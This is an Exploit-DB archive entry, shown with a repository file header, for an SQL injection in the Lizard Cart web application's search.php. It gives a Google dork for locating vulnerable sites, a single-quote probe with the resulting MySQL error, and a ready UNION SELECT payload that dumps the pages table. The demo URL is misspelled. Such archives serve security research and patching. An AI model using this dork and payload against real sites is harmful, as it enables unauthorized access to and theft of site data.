exploit-db-mirror/exploits/php/webapps/18561.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

22 lines
No EOL
976 B
Text

# Exploit Title: [lizard cart SQLi (search.php)]
# Google Dork: [inurl:search.php+intitle:"Lizard Cart"+intext:"Search Results:"]
# Date: [05-03-2012]
# Author: [Number 7]
# Software Link: [http://sourceforge.net/projects/lizardcart/files/latest/download?source=directory]
# Version: [pp104]
# Tested on: [Windows]
_____________________________________________________________________________________________
Usage:
http://localhost/liza/search.php?metode=1'
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in C:\AppServ\www\liza\search.php on line 15
http://localhost/liza/search.php?metode=[SQLi]
search.php?metode=-1+union+select+1,2,concat(id,0x3e,page_title,0x3e,page_content),4,5,6,7,8+from+pages--
Demo:
htptp://localhost/liza/search.php?metode=-1+union+select+1,2,concat(id,0x3e,page_title,0x3e,page_content),4,5,6,7,8+from+pages--
_____________________________________________________________________________________________